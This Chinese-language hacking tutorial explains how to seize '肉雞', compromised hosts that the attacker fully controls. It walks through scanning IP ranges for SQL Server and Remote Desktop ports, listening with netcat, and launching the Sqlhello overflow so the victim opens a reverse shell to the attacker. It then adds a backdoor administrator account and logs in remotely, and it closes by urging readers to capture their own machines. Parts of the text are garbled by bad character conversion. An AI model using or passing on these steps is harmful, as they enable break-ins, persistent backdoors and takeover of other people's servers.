近些年來，計算機的安全性能，曾突飛猛進的上升勢頭。導致以前網(wǎng)絡(luò)，遍地都是的弱口令肉雞，現(xiàn)在早已消失的不知去向。可見其安全的提升程度，難道菜鳥抓取肉雞成為了“天方夜潭”?當然答案是否定的，具體如何獲取肉雞請看下文所示!
　　小提示:肉雞是指在網(wǎng)絡(luò)上，已經(jīng)被你成功入侵的主機，并且這臺機器完全受控于入侵者的任意操作，如同本機操控一樣的直觀順手。
　　一、踩點掃描——尋找目標
　　俗話說:知己知彼，百戰(zhàn)百勝!這里在網(wǎng)絡(luò)中攻破一臺主機，也是同樣的道理，或者換句話說:擁有一款超強掃描的刺探工具，才是您能否走向入侵成功的關(guān)鍵。
　　首先筆者從網(wǎng)上下載大名鼎鼎的SuperScan端口掃描工具(下載地址:http://www.yezie.com/Down/list.aspx?id=109229)，操作完畢后，雙擊解壓出來的“主程序”圖標，彈出SuperScan工具操作界面(如圖1)。然后在左邊“開始IP”以及STOP(結(jié)束)IP標簽處，輸入想要查找的肉雞IP網(wǎng)段，在選取掃描的服務(wù)。單擊右上角“端口列表設(shè)置”按鈕，進入“自定義端口”窗體，在“端口”標簽處，輸入1433的端口數(shù)字，單擊“增加”按鈕，編輯區(qū)就會出現(xiàn)紅色字體的1433端口，在雙擊其數(shù)字，前面會有一個"√"的標志，證明該端口已經(jīng)添加完畢，然后在按照上一步添加端口的步驟，將3389端口也填入到其中。在單擊“保存”按鈕，選擇端口為端口列表，會順“原路”返回到主界面。在掃描類型內(nèi)選擇All selected port in list單選框，點擊“開始”按鈕，檢測啟動。稍等一會后，在所設(shè)立的網(wǎng)段中，符合要求的主機，會立刻“浮現(xiàn)”在下方編輯區(qū)域內(nèi)。

圖 1
二、天羅地網(wǎng)——監(jiān)聽端口
　　既然“柔弱”的主機，都已被掃描器“撕破了臉皮揭曉”，接下來要做的就是布下“天羅地網(wǎng)”，等待那些含有漏洞的目標主機“自投羅網(wǎng)”，布置所用的工具——瑞士軍刀NC監(jiān)聽。
　　為了方便本文以下講解，筆者已經(jīng)將其下載到本地I盤符，然后單擊“開始”菜單，選擇“運行”選項。在出現(xiàn)的“打開”標簽處，輸入CMD字符命令，并且敲擊“回車”鍵，會立即彈出“命令行”式對話框。在光標閃爍處敲入DOS跳轉(zhuǎn)命令，進入到NC工具所在的目錄，開始執(zhí)行該軟件所提供的監(jiān)聽功能，這里輸入NC –v v –l –p 1987的命令回車，如果命令行下出現(xiàn)等待的“省略號”提示信息(如圖2)，證明已經(jīng)成功，監(jiān)聽本機1987端口。

圖 2
　　小提示:NC軟件里的-vv參數(shù)代表，得到更詳細的輸入監(jiān)聽內(nèi)容。-l代表連接端口關(guān)閉后，仍然繼續(xù)監(jiān)聽。-p進行監(jiān)聽本地端口，后跟數(shù)字就是所要監(jiān)聽的端口號。
　　三、驅(qū)趕肉雞——進入所布下的陷阱
　　等待肉雞上門，自然不是聰明的辦法，更不知道何時，才能有主機訪問到本地布下的“網(wǎng)罩”。所以要使用Sqlhello攻擊工具的功能，驅(qū)趕目標機器強行“重招”，來加速其訪問“陷阱”的效率。
　　此時，將正在監(jiān)聽的命令窗體，呈最下化模式，回到WINDOWS圖形化操作界面。然后在硬盤驅(qū)動器中，找到筆者事先下載的Sqlhello溢出工具所在目錄，你會發(fā)現(xiàn)與以往工具目錄，不同的是多出一個1.BAT批處理文件，其實這是Sqlhello溢出工具的執(zhí)行臺，在以“編輯”選項的形式打開。輸入其格式為Sqlhello 目標主機IP 1433 本機IP 監(jiān)聽端口的命令(如圖3)，單擊右上角“關(guān)閉”按鈕，保存其文件內(nèi)容結(jié)束。操作完畢后，再次雙擊1.BAT批處理文件，會快速的閃過DOS命令窗體，可見該批處理已經(jīng)操控著Sqlhello工具，開始溢出攻擊了。然后回到還在監(jiān)聽的NC命令窗體，等待的省略號已經(jīng)變?yōu)榱讼到y(tǒng)的SHELL，這也正是遠程主機的命令控制臺。

圖 3
　　小提示:SHELL是操作系統(tǒng)的最外層，管理著你與操作系統(tǒng)交互、通訊、執(zhí)行等工作的操作，假設(shè)你已經(jīng)得到了對方的SHELL，也就代表著你擁有了與對方計算機直接溝通、下達命令的平臺。
　　在其命令行下輸入Net User Administrators Wenpeng 123456 /ADD的命令，就可以建立一個屬于自己名為“Wenpeng”，密碼是123456的普通帳戶。在將所建用戶的權(quán)限提升為管理員，敲入Net Localgroup Administrators wenpeng /add命令回車，即可提示命令成功完成的內(nèi)容。最后使用本機自帶的遠程終端軟件，敲入剛才溢出的IP以及建立/提升的用戶，進行“遠程連接”登錄，稍等片刻后，屏幕會立即出現(xiàn)非常直觀的肉雞桌面(如圖4)。

圖 4
　　可見目前已被攻破的主機，在讓筆者任由“擺步”的同時，還可以像操作本機一樣得心應(yīng)手。相信這樣理想的肉雞，您一定不會錯過。何不一同依照本文所提供的方法，來獲取自己“夢寐以求”的肉雞呢?

最新評論